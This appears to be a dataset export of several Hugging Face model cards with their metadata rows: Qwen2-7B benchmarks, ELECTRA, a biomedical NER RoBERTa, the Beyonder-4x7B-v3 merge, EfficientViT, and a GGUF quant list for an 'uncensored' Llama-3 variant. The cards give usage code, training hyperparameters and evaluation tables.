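    device_map="auto",  # requires accelerate
)

inputs = tokenizer("The Great Wall of China is", return_tensors="pt").to(model.device)
outputs = model.generate(**inputs, max_new_tokens=32)
print(tokenizer.decode(outputs[0], skip_special_tokens=True))
```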
### Performance
The evaluation of base models mainly focuses on the model performance of natural language understanding, general question answering, coding, mathematics, scientific knowledge, reasoning, multilingual capability, etc.
The datasets for evaluation include:
**English Tasks**: MMLU (5-shot), MMLU-Pro (5-shot), GPQA (5-shot), Theorem QA (5-shot), BBH (3-shot), HellaSwag (10-shot), Winogrande (5-shot), TruthfulQA (0-shot), ARC-C (25-shot)
**Coding Tasks**: EvalPlus (0-shot) (HumanEval, MBPP, HumanEval+, MBPP+), MultiPL-E (0-shot) (Python, C++, JAVA, PHP, TypeScript, C#, Bash, JavaScript)
**Math Tasks**: GSM8K (4-shot), MATH (4-shot)
**Chinese Tasks**: C-Eval(5-shot), CMMLU (5-shot)
**Multilingual Tasks**: Multi-Exam (M3Exam 5-shot, IndoMMLU 3-shot, ruMMLU 5-shot, mMMLU 5-shot), Multi-Understanding (BELEBELE 5-shot, XCOPA 5-shot, XWinograd 5-shot, XStoryCloze 0-shot, PAWS-X 5-shot), Multi-Mathematics (MGSM 8-shot), Multi-Translation (Flores-101 5-shot)
#### Qwen2-7B performance
| Datasets | Mistral-7B | Gemma-7B | Llama-3-8B | Qwen1.5-7B | Qwen2-7B |
| :--------| :---------: | :------------: | :------------: | :------------: | :------------: |
|# Params | 7.2B | 8.5B | 8.0B | 7.7B | 7.6B |
|# Non-emb Params | 7.0B | 7.8B | 7.0B | 6.5B | 6.5B |
| ***English*** | | | | | |
|MMLU | 64.2 | 64.6 | 66.6 | 61.0 | **70.3** |
|MMLU-Pro | 30.9 | 33.7 | 35.4 | 29.9 | **40.0** |
|GPQA | 24.7 | 25.7 | 25.8 | 26.7 | **31.8** |
|Theorem QA | 19.2 | 21.5 | 22.1 | 14.2 | **31.1** |
|BBH | 56.1 | 55.1 | 57.7 | 40.2 | **62.6** |
|HellaSwag | **83.2** | 82.2 | 82.1 | 78.5 | 80.7 |
|Winogrande | 78.4 | **79.0** | 77.4 | 71.3 | 77.0 |
|ARC-C | 60.0 | **61.1** | 59.3 | 54.2 | 60.6 |
|TruthfulQA | 42.2 | 44.8 | 44.0 | 51.1 | **54.2** |
| ***Coding*** | | | | | |
|HumanEval | 29.3 | 37.2 | 33.5 | 36.0 | **51.2** |
|MBPP | 51.1 | 50.6 | 53.9 | 51.6 | **65.9** |
|EvalPlus | 36.4 | 39.6 | 40.3 | 40.0 | **54.2** |
|MultiPL-E | 29.4 | 29.7 | 22.6 | 28.1 | **46.3** |
| ***Mathematics*** | | | | | |
|GSM8K | 52.2 | 46.4 | 56.0 | 62.5 | **79.9** |
|MATH | 13.1 | 24.3 | 20.5 | 20.3 | **44.2** |
| ***Chinese*** | | | | | |
|C-Eval | 47.4 | 43.6 | 49.5 | 74.1 | **83.2** |
|CMMLU | - | - | 50.8 | 73.1 | **83.9** |
| ***Multilingual*** | | | | | |
|Multi-Exam | 47.1 | 42.7 | 52.3 | 47.7 | **59.2** |
|Multi-Understanding | 63.3 | 58.3 | 68.6 | 67.6 | **72.0** |
|Multi-Mathematics | 26.3 | 39.1 | 36.3 | 37.3 | **57.5** |
|Multi-Translation | 23.3 | 31.2 | **31.9** | 28.4 | 31.5 |
## Citation
If you find our work helpful, feel free to cite us.
```
@article{qwen2,
title={Qwen2 Technical Report},
year={2024}
}
```
|
google/electra-base-generator | google | "2024-02-29T10:20:15Z" | 3,616 | 6 | transformers | [
"transformers",
"pytorch",
"tf",
"jax",
"rust",
"electra",
"fill-mask",
"en",
"arxiv:1406.2661",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | fill-mask | "2022-03-02T23:29:05Z" | ---
language: en
thumbnail: https://huggingface.co/front/thumbnails/google.png
license: apache-2.0
---
## ELECTRA: Pre-training Text Encoders as Discriminators Rather Than Generators
**ELECTRA** is a new method for self-supervised language representation learning. It can be used to pre-train transformer networks using relatively little compute. ELECTRA models are trained to distinguish "real" input tokens vs "fake" input tokens generated by another neural network, similar to the discriminator of a [GAN](https://arxiv.org/pdf/1406.2661.pdf). At small scale, ELECTRA achieves strong results even when trained on a single GPU. At large scale, ELECTRA achieves state-of-the-art results on the [SQuAD 2.0](https://rajpurkar.github.io/SQuAD-explorer/) dataset.
For a detailed description and experimental results, please refer to our paper [ELECTRA: Pre-training Text Encoders as Discriminators Rather Than Generators](https://openreview.net/pdf?id=r1xMH1BtvB).
This repository contains code to pre-train ELECTRA, including small ELECTRA models on a single GPU. It also supports fine-tuning ELECTRA on downstream tasks including classification tasks (e.g., [GLUE](https://gluebenchmark.com/)), QA tasks (e.g., [SQuAD](https://rajpurkar.github.io/SQuAD-explorer/)), and sequence tagging tasks (e.g., [text chunking](https://www.clips.uantwerpen.be/conll2000/chunking/)).
## How to use the generator in `transformers`
```python
from transformers import pipeline
fill_mask = pipeline(
"fill-mask",
model="google/electra-base-generator",
tokenizer="google/electra-base-generator"
)
print(
fill_mask(f"HuggingFace is creating a {fill_mask.tokenizer.mask_token} that the community uses to solve NLP tasks.")
)
```
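The same masked-token prediction can also be done without the pipeline helper; a rough sketch (the example sentence is arbitrary):
```python
import torch
from transformers import AutoModelForMaskedLM, AutoTokenizer

tokenizer = AutoTokenizer.from_pretrained("google/electra-base-generator")
model = AutoModelForMaskedLM.from_pretrained("google/electra-base-generator")

text = f"HuggingFace is creating a {tokenizer.mask_token} that the community uses to solve NLP tasks."
inputs = tokenizer(text, return_tensors="pt")

with torch.no_grad():
    logits = model(**inputs).logits

# take the highest-scoring token at the [MASK] position
mask_pos = (inputs.input_ids == tokenizer.mask_token_id).nonzero(as_tuple=True)[1]
predicted_id = logits[0, mask_pos].argmax(dim=-1)
print(tokenizer.decode(predicted_id))
```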
|
StivenLancheros/roberta-base-biomedical-clinical-es-finetuned-ner-CRAFT_AugmentedTransfer_ES | StivenLancheros | "2022-03-21T22:36:06Z" | 3,615 | 0 | transformers | [
"transformers",
"pytorch",
"tensorboard",
"roberta",
"token-classification",
"generated_from_trainer",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | token-classification | "2022-03-21T22:05:55Z" | ---
license: apache-2.0
tags:
- generated_from_trainer
metrics:
- precision
- recall
- f1
- accuracy
model-index:
- name: roberta-base-biomedical-clinical-es-finetuned-ner-CRAFT_AugmentedTransfer_ES
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# roberta-base-biomedical-clinical-es-finetuned-ner-CRAFT_AugmentedTransfer_ES
This model is a fine-tuned version of [StivenLancheros/roberta-base-biomedical-clinical-es-finetuned-ner-CRAFT_Augmented_ES](https://huggingface.co/StivenLancheros/roberta-base-biomedical-clinical-es-finetuned-ner-CRAFT_Augmented_ES) on the CRAFT dataset.
It achieves the following results on the evaluation set:
- Loss: 0.2043
- Precision: 0.8666
- Recall: 0.8614
- F1: 0.8639
- Accuracy: 0.9734
## Model description
This model performs Named Entity Recognition for 6 entity tags: Sequence, Cell, Protein, Gene, Taxon, and Chemical from the CRAFT (Colorado Richly Annotated Full Text) Corpus in Spanish (MT translated) and English. Entity tags have been normalized and replaced from the original three-letter codes to full names, e.g. B-Protein, I-Chemical.
This model is trained on augmented data created using Entity Replacement. 20% of the entities were replaced using a list of entities for each entity tag obtained from the official ontologies for each entity class. Three datasets (original, augmented, MT-translated CRAFT) were concatenated. To improve the F1 score, transfer learning was completed in two steps.
Using [StivenLancheros/roberta-base-biomedical-clinical-es-finetuned-ner-CRAFT_Augmented_ES](https://huggingface.co/StivenLancheros/roberta-base-biomedical-clinical-es-finetuned-ner-CRAFT_Augmented_ES) as a base model, I fine-tuned once more on the original CRAFT dataset in English.
Biobert --> Augmented CRAFT --> CRAFT ES (MT translated)
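A minimal sketch of running the model for NER with the `transformers` pipeline (the aggregation strategy and the example sentence are just illustrative choices):
```python
from transformers import pipeline

ner = pipeline(
    "token-classification",
    model="StivenLancheros/roberta-base-biomedical-clinical-es-finetuned-ner-CRAFT_AugmentedTransfer_ES",
    aggregation_strategy="simple",  # merge word pieces into whole entity spans
)

text = "The BRCA1 protein is expressed in Homo sapiens cells treated with tamoxifen."
for entity in ner(text):
    print(entity["entity_group"], entity["word"], round(entity["score"], 3))
```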
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 3e-05
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 4
### Training results
| Training Loss | Epoch | Step | Validation Loss | Precision | Recall | F1 | Accuracy |
|:-------------:|:-----:|:----:|:---------------:|:---------:|:------:|:------:|:--------:|
| 0.0088 | 1.0 | 1360 | 0.1793 | 0.8616 | 0.8487 | 0.8551 | 0.9721 |
| 0.0046 | 2.0 | 2720 | 0.1925 | 0.8618 | 0.8426 | 0.8521 | 0.9713 |
| 0.0032 | 3.0 | 4080 | 0.1926 | 0.8558 | 0.8630 | 0.8594 | 0.9725 |
| 0.0011 | 4.0 | 5440 | 0.2043 | 0.8666 | 0.8614 | 0.8639 | 0.9734 |
### Framework versions
- Transformers 4.17.0
- Pytorch 1.10.0+cu111
- Datasets 2.0.0
- Tokenizers 0.11.6
|
mlabonne/Beyonder-4x7B-v3 | mlabonne | "2024-03-28T21:05:48Z" | 3,615 | 56 | transformers | [
"transformers",
"safetensors",
"mixtral",
"text-generation",
"moe",
"frankenmoe",
"merge",
"mergekit",
"lazymergekit",
"conversational",
"base_model:mlabonne/AlphaMonarch-7B",
"base_model:beowolx/CodeNinja-1.0-OpenChat-7B",
"base_model:SanjiWatsuki/Kunoichi-DPO-v2-7B",
"base_model:mlabonne/NeuralDaredevil-7B",
"license:cc-by-nc-4.0",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2024-03-21T22:13:23Z" | ---
license: cc-by-nc-4.0
tags:
- moe
- frankenmoe
- merge
- mergekit
- lazymergekit
base_model:
- mlabonne/AlphaMonarch-7B
- beowolx/CodeNinja-1.0-OpenChat-7B
- SanjiWatsuki/Kunoichi-DPO-v2-7B
- mlabonne/NeuralDaredevil-7B
---

# 🔮 Beyonder-4x7B-v3
Beyonder-4x7B-v3 is an improvement over the popular [Beyonder-4x7B-v2](https://huggingface.co/mlabonne/Beyonder-4x7B-v2). It's a Mixture of Experts (MoE) made with the following models using [LazyMergekit](https://colab.research.google.com/drive/1obulZ1ROXHjYLn6PPZJwRR6GzgQogxxb?usp=sharing):
* [mlabonne/AlphaMonarch-7B](https://huggingface.co/mlabonne/AlphaMonarch-7B)
* [beowolx/CodeNinja-1.0-OpenChat-7B](https://huggingface.co/beowolx/CodeNinja-1.0-OpenChat-7B)
* [SanjiWatsuki/Kunoichi-DPO-v2-7B](https://huggingface.co/SanjiWatsuki/Kunoichi-DPO-v2-7B)
* [mlabonne/NeuralDaredevil-7B](https://huggingface.co/mlabonne/NeuralDaredevil-7B)
Special thanks to [beowolx](https://huggingface.co/beowolx) for making the best Mistral-based code model and to [SanjiWatsuki](https://huggingface.co/SanjiWatsuki) for creating one of the very best RP models.
**Try the demo**: https://huggingface.co/spaces/mlabonne/Beyonder-4x7B-v3
## 🔍 Applications
This model uses a context window of 8k. I recommend using it with the Mistral Instruct chat template (works perfectly with LM Studio).
If you use SillyTavern, you might want to tweak the inference parameters. Here's what LM Studio uses as a reference: `temp` 0.8, `top_k` 40, `top_p` 0.95, `min_p` 0.05, `repeat_penalty` 1.1.
Thanks to its four experts, it's a well-rounded model, capable of handling most tasks. Because two experts are always used to generate an answer, every task benefits from other capabilities, like chat with RP, or math with code.
## ⚡ Quantized models
Thanks [bartowski](https://huggingface.co/bartowski) for quantizing this model.
* **GGUF**: https://huggingface.co/mlabonne/Beyonder-4x7B-v3-GGUF
* **More GGUF**: https://huggingface.co/bartowski/Beyonder-4x7B-v3-GGUF
* **ExLlamaV2**: https://huggingface.co/bartowski/Beyonder-4x7B-v3-exl2
## 🏆 Evaluation
This model is not designed to excel in traditional benchmarks, as the code and role-playing experts generally do not apply to those contexts. Nonetheless, it performs remarkably well thanks to its strong general-purpose experts.
### Nous
Beyonder-4x7B-v3 is one of the best models on Nous' benchmark suite (evaluation performed using [LLM AutoEval](https://github.com/mlabonne/llm-autoeval)) and significantly outperforms the v2. See the entire leaderboard [here](https://huggingface.co/spaces/mlabonne/Yet_Another_LLM_Leaderboard).
| Model | Average | AGIEval | GPT4All | TruthfulQA | Bigbench |
|---|---:|---:|---:|---:|---:|
| [mlabonne/AlphaMonarch-7B](https://huggingface.co/mlabonne/AlphaMonarch-7B) [📄](https://gist.github.com/mlabonne/1d33c86824b3a11d2308e36db1ba41c1) | 62.74 | 45.37 | 77.01 | 78.39 | 50.2 |
| [**mlabonne/Beyonder-4x7B-v3**](https://huggingface.co/mlabonne/Beyonder-4x7B-v3) [📄](https://gist.github.com/mlabonne/3740020807e559f7057c32e85ce42d92) | **61.91** | **45.85** | **76.67** | **74.98** | **50.12** |
| [mlabonne/NeuralDaredevil-7B](https://huggingface.co/mlabonne/NeuralDaredevil-7B) [📄](https://gist.github.com/mlabonne/cbeb077d1df71cb81c78f742f19f4155) | 59.39 | 45.23 | 76.2 | 67.61 | 48.52 |
| [SanjiWatsuki/Kunoichi-DPO-v2-7B](https://huggingface.co/SanjiWatsuki/Kunoichi-DPO-v2-7B) [📄](https://gist.github.com/mlabonne/895ff5171e998abfdf2a41a4f9c84450) | 58.29 | 44.79 | 75.05 | 65.68 | 47.65 |
| [mlabonne/Beyonder-4x7B-v2](https://huggingface.co/mlabonne/Beyonder-4x7B-v2) [📄](https://gist.github.com/mlabonne/f73baa140a510a676242f8a4496d05ca) | 57.13 | 45.29 | 75.95 | 60.86 | 46.4 |
| [beowolx/CodeNinja-1.0-OpenChat-7B](https://huggingface.co/beowolx/CodeNinja-1.0-OpenChat-7B) [📄](https://gist.github.com/mlabonne/08b5280c221fbd7f98eb27561ae902a3) | 50.35 | 39.98 | 71.77 | 48.73 | 40.92 |
### EQ-Bench
Beyonder-4x7B-v3 is the best 4x7B model on the EQ-Bench leaderboard, outperforming older versions of ChatGPT and Llama-2-70b-chat. It is very close to Mixtral-8x7B-Instruct-v0.1 and Gemini Pro. Thanks [Sam Paech](https://huggingface.co/sam-paech) for running the eval.

### Open LLM Leaderboard
It's also a strong performer on the Open LLM Leaderboard, significantly outperforming the v2 model.

## 🧩 Configuration
```yaml
base_model: mlabonne/AlphaMonarch-7B
experts:
- source_model: mlabonne/AlphaMonarch-7B
positive_prompts:
- "chat"
- "assistant"
- "tell me"
- "explain"
- "I want"
- source_model: beowolx/CodeNinja-1.0-OpenChat-7B
positive_prompts:
- "code"
- "python"
- "javascript"
- "programming"
- "algorithm"
- source_model: SanjiWatsuki/Kunoichi-DPO-v2-7B
positive_prompts:
- "storywriting"
- "write"
- "scene"
- "story"
- "character"
- source_model: mlabonne/NeuralDaredevil-7B
positive_prompts:
- "reason"
- "math"
- "mathematics"
- "solve"
- "count"
```
## 🌳 Model Family Tree

## 💻 Usage
```python
!pip install -qU transformers bitsandbytes accelerate
from transformers import AutoTokenizer
import transformers
import torch
model = "mlabonne/Beyonder-4x7B-v3"
tokenizer = AutoTokenizer.from_pretrained(model)
pipeline = transformers.pipeline(
"text-generation",
model=model,
model_kwargs={"torch_dtype": torch.float16, "load_in_4bit": True},
)
messages = [{"role": "user", "content": "Explain what a Mixture of Experts is in less than 100 words."}]
prompt = pipeline.tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)
outputs = pipeline(prompt, max_new_tokens=256, do_sample=True, temperature=0.7, top_k=50, top_p=0.95)
print(outputs[0]["generated_text"])
```
Output:
> A Mixture of Experts (MoE) is a neural network architecture that tackles complex tasks by dividing them into simpler subtasks, delegating each to specialized expert modules. These experts learn to independently handle specific problem aspects. The MoE structure combines their outputs, leveraging their expertise for improved overall performance. This approach promotes modularity, adaptability, and scalability, allowing for better generalization in various applications. |
timm/efficientvit_b0.r224_in1k | timm | "2023-11-21T21:43:41Z" | 3,614 | 2 | timm | [
"timm",
"pytorch",
"safetensors",
"image-classification",
"dataset:imagenet-1k",
"arxiv:2205.14756",
"license:apache-2.0",
"region:us"
] | image-classification | "2023-08-18T22:44:10Z" | ---
tags:
- image-classification
- timm
library_name: timm
license: apache-2.0
datasets:
- imagenet-1k
---
# Model card for efficientvit_b0.r224_in1k
An EfficientViT (MIT) image classification model. Trained on ImageNet-1k by paper authors.
## Model Details
- **Model Type:** Image classification / feature backbone
- **Model Stats:**
- Params (M): 3.4
- GMACs: 0.1
- Activations (M): 2.9
- Image size: 224 x 224
- **Papers:**
- EfficientViT: Multi-Scale Linear Attention for High-Resolution Dense Prediction: https://arxiv.org/abs/2205.14756
- **Original:** https://github.com/mit-han-lab/efficientvit
- **Dataset:** ImageNet-1k
## Model Usage
### Image Classification
```python
from urllib.request import urlopen
from PIL import Image
import timm
import torch  # needed below for torch.topk
img = Image.open(urlopen(
'https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/beignets-task-guide.png'
))
model = timm.create_model('efficientvit_b0.r224_in1k', pretrained=True)
model = model.eval()
# get model specific transforms (normalization, resize)
data_config = timm.data.resolve_model_data_config(model)
transforms = timm.data.create_transform(**data_config, is_training=False)
output = model(transforms(img).unsqueeze(0)) # unsqueeze single image into batch of 1
top5_probabilities, top5_class_indices = torch.topk(output.softmax(dim=1) * 100, k=5)
```
### Feature Map Extraction
```python
from urllib.request import urlopen
from PIL import Image
import timm
img = Image.open(urlopen(
'https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/beignets-task-guide.png'
))
model = timm.create_model(
'efficientvit_b0.r224_in1k',
pretrained=True,
features_only=True,
)
model = model.eval()
# get model specific transforms (normalization, resize)
data_config = timm.data.resolve_model_data_config(model)
transforms = timm.data.create_transform(**data_config, is_training=False)
output = model(transforms(img).unsqueeze(0)) # unsqueeze single image into batch of 1
for o in output:
# print shape of each feature map in output
# e.g.:
# torch.Size([1, 16, 56, 56])
# torch.Size([1, 32, 28, 28])
# torch.Size([1, 64, 14, 14])
# torch.Size([1, 128, 7, 7])
print(o.shape)
```
### Image Embeddings
```python
from urllib.request import urlopen
from PIL import Image
import timm
img = Image.open(urlopen(
'https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/beignets-task-guide.png'
))
model = timm.create_model(
'efficientvit_b0.r224_in1k',
pretrained=True,
num_classes=0, # remove classifier nn.Linear
)
model = model.eval()
# get model specific transforms (normalization, resize)
data_config = timm.data.resolve_model_data_config(model)
transforms = timm.data.create_transform(**data_config, is_training=False)
output = model(transforms(img).unsqueeze(0)) # output is (batch_size, num_features) shaped tensor
# or equivalently (without needing to set num_classes=0)
output = model.forward_features(transforms(img).unsqueeze(0))
# output is unpooled, a (1, 128, 7, 7) shaped tensor
output = model.forward_head(output, pre_logits=True)
# output is a (1, num_features) shaped tensor
```
## Citation
```bibtex
@article{cai2022efficientvit,
title={EfficientViT: Enhanced linear attention for high-resolution low-computation visual recognition},
author={Cai, Han and Gan, Chuang and Han, Song},
journal={arXiv preprint arXiv:2205.14756},
year={2022}
}
```
|
bartowski/Lexi-Llama-3-8B-Uncensored-GGUF | bartowski | "2024-04-24T04:14:19Z" | 3,613 | 19 | null | [
"gguf",
"uncensored",
"llama3",
"instruct",
"open",
"text-generation",
"license:llama3",
"region:us"
] | text-generation | "2024-04-24T03:51:21Z" | ---
license: llama3
tags:
- uncensored
- llama3
- instruct
- open
quantized_by: bartowski
pipeline_tag: text-generation
---
## Llamacpp imatrix Quantizations of Lexi-Llama-3-8B-Uncensored
Using <a href="https://github.com/ggerganov/llama.cpp/">llama.cpp</a> release <a href="https://github.com/ggerganov/llama.cpp/releases/tag/b2714">b2714</a> for quantization.
Original model: https://huggingface.co/Orenguteng/Lexi-Llama-3-8B-Uncensored
All quants made using imatrix option with dataset provided by Kalomaze [here](https://github.com/ggerganov/llama.cpp/discussions/5263#discussioncomment-8395384)
## Prompt format
```
<|begin_of_text|><|start_header_id|>system<|end_header_id|>
{system_prompt}<|eot_id|><|start_header_id|>user<|end_header_id|>
{prompt}<|eot_id|><|start_header_id|>assistant<|end_header_id|>
```
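A small sketch of assembling that template in Python before handing it to llama.cpp or another backend (the system prompt and user message are placeholders; newline placement follows the standard Llama-3 instruct template):
```python
def build_prompt(system_prompt: str, prompt: str) -> str:
    # Mirrors the Llama-3 instruct format shown above
    return (
        "<|begin_of_text|><|start_header_id|>system<|end_header_id|>\n\n"
        f"{system_prompt}<|eot_id|><|start_header_id|>user<|end_header_id|>\n\n"
        f"{prompt}<|eot_id|><|start_header_id|>assistant<|end_header_id|>\n\n"
    )

print(build_prompt("You are a helpful assistant.", "Write a haiku about quantization."))
```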
## Download a file (not the whole branch) from below:
| Filename | Quant type | File Size | Description |
| -------- | ---------- | --------- | ----------- |
| [Lexi-Llama-3-8B-Uncensored-Q8_0.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-Q8_0.gguf) | Q8_0 | 8.54GB | Extremely high quality, generally unneeded but max available quant. |
| [Lexi-Llama-3-8B-Uncensored-Q6_K.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-Q6_K.gguf) | Q6_K | 6.59GB | Very high quality, near perfect, *recommended*. |
| [Lexi-Llama-3-8B-Uncensored-Q5_K_M.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-Q5_K_M.gguf) | Q5_K_M | 5.73GB | High quality, *recommended*. |
| [Lexi-Llama-3-8B-Uncensored-Q5_K_S.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-Q5_K_S.gguf) | Q5_K_S | 5.59GB | High quality, *recommended*. |
| [Lexi-Llama-3-8B-Uncensored-Q4_K_M.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-Q4_K_M.gguf) | Q4_K_M | 4.92GB | Good quality, uses about 4.83 bits per weight, *recommended*. |
| [Lexi-Llama-3-8B-Uncensored-Q4_K_S.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-Q4_K_S.gguf) | Q4_K_S | 4.69GB | Slightly lower quality with more space savings, *recommended*. |
| [Lexi-Llama-3-8B-Uncensored-IQ4_NL.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-IQ4_NL.gguf) | IQ4_NL | 4.67GB | Decent quality, slightly smaller than Q4_K_S with similar performance *recommended*. |
| [Lexi-Llama-3-8B-Uncensored-IQ4_XS.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-IQ4_XS.gguf) | IQ4_XS | 4.44GB | Decent quality, smaller than Q4_K_S with similar performance, *recommended*. |
| [Lexi-Llama-3-8B-Uncensored-Q3_K_L.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-Q3_K_L.gguf) | Q3_K_L | 4.32GB | Lower quality but usable, good for low RAM availability. |
| [Lexi-Llama-3-8B-Uncensored-Q3_K_M.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-Q3_K_M.gguf) | Q3_K_M | 4.01GB | Even lower quality. |
| [Lexi-Llama-3-8B-Uncensored-IQ3_M.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-IQ3_M.gguf) | IQ3_M | 3.78GB | Medium-low quality, new method with decent performance comparable to Q3_K_M. |
| [Lexi-Llama-3-8B-Uncensored-IQ3_S.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-IQ3_S.gguf) | IQ3_S | 3.68GB | Lower quality, new method with decent performance, recommended over Q3_K_S quant, same size with better performance. |
| [Lexi-Llama-3-8B-Uncensored-Q3_K_S.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-Q3_K_S.gguf) | Q3_K_S | 3.66GB | Low quality, not recommended. |
| [Lexi-Llama-3-8B-Uncensored-IQ3_XS.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-IQ3_XS.gguf) | IQ3_XS | 3.51GB | Lower quality, new method with decent performance, slightly better than Q3_K_S. |
| [Lexi-Llama-3-8B-Uncensored-IQ3_XXS.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-IQ3_XXS.gguf) | IQ3_XXS | 3.27GB | Lower quality, new method with decent performance, comparable to Q3 quants. |
| [Lexi-Llama-3-8B-Uncensored-Q2_K.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-Q2_K.gguf) | Q2_K | 3.17GB | Very low quality but surprisingly usable. |
| [Lexi-Llama-3-8B-Uncensored-IQ2_M.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-IQ2_M.gguf) | IQ2_M | 2.94GB | Very low quality, uses SOTA techniques to also be surprisingly usable. |
| [Lexi-Llama-3-8B-Uncensored-IQ2_S.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-IQ2_S.gguf) | IQ2_S | 2.75GB | Very low quality, uses SOTA techniques to be usable. |
| [Lexi-Llama-3-8B-Uncensored-IQ2_XS.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-IQ2_XS.gguf) | IQ2_XS | 2.60GB | Very low quality, uses SOTA techniques to be usable. |
| [Lexi-Llama-3-8B-Uncensored-IQ2_XXS.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-IQ2_XXS.gguf) | IQ2_XXS | 2.39GB | Lower quality, uses SOTA techniques to be usable. |
| [Lexi-Llama-3-8B-Uncensored-IQ1_M.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-IQ1_M.gguf) | IQ1_M | 2.16GB | Extremely low quality, *not* recommended. |
| [Lexi-Llama-3-8B-Uncensored-IQ1_S.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-IQ1_S.gguf) | IQ1_S | 2.01GB | Extremely low quality, *not* recommended. |
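If you only want a single quant rather than the whole branch, one option is `huggingface_hub` (the filename below is just one example from the table; assumes a reasonably recent `huggingface_hub`):
```python
from huggingface_hub import hf_hub_download

path = hf_hub_download(
    repo_id="bartowski/Lexi-Llama-3-8B-Uncensored-GGUF",
    filename="Lexi-Llama-3-8B-Uncensored-Q4_K_M.gguf",  # pick any file listed above
    local_dir=".",
)
print(path)
```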
## Which file should I choose?
A great write up with charts showing various performances is provided by Artefact2 [here](https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9)
The first thing to figure out is how big a model you can run. To do this, you'll need to figure out how much RAM and/or VRAM you have.
If you want your model running as FAST as possible, you'll want to fit the whole thing on your GPU's VRAM. Aim for a quant with a file size 1-2GB smaller than your GPU's total VRAM.
If you want the absolute maximum quality, add both your system RAM and your GPU's VRAM together, then similarly grab a quant with a file size 1-2GB smaller than that total.
Next, you'll need to decide if you want to use an 'I-quant' or a 'K-quant'.
If you don't want to think too much, grab one of the K-quants. These are in format 'QX_K_X', like Q5_K_M.
If you want to get more into the weeds, you can check out this extremely useful feature chart:
[llama.cpp feature matrix](https://github.com/ggerganov/llama.cpp/wiki/Feature-matrix)
But basically, if you're aiming for below Q4, and you're running cuBLAS (Nvidia) or rocBLAS (AMD), you should look towards the I-quants. These are in format IQX_X, like IQ3_M. These are newer and offer better performance for their size.
These I-quants can also be used on CPU and Apple Metal, but will be slower than their K-quant equivalent, so speed vs performance is a tradeoff you'll have to decide.
The I-quants are *not* compatible with Vulkan, which also supports AMD, so if you have an AMD card, double check if you're using the rocBLAS build or the Vulkan build. At the time of writing this, LM Studio has a preview with ROCm support, and other inference engines have specific builds for ROCm.
Want to support my work? Visit my ko-fi page here: https://ko-fi.com/bartowski
|
google/bigbird-pegasus-large-bigpatent | google | "2023-01-24T16:36:44Z" | 3,611 | 35 | transformers | [
"transformers",
"pytorch",
"bigbird_pegasus",
"text2text-generation",
"summarization",
"en",
"dataset:big_patent",
"arxiv:2007.14062",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | summarization | "2022-03-02T23:29:05Z" | ---
language: en
license: apache-2.0
datasets:
- big_patent
tags:
- summarization
---
# BigBirdPegasus model (large)
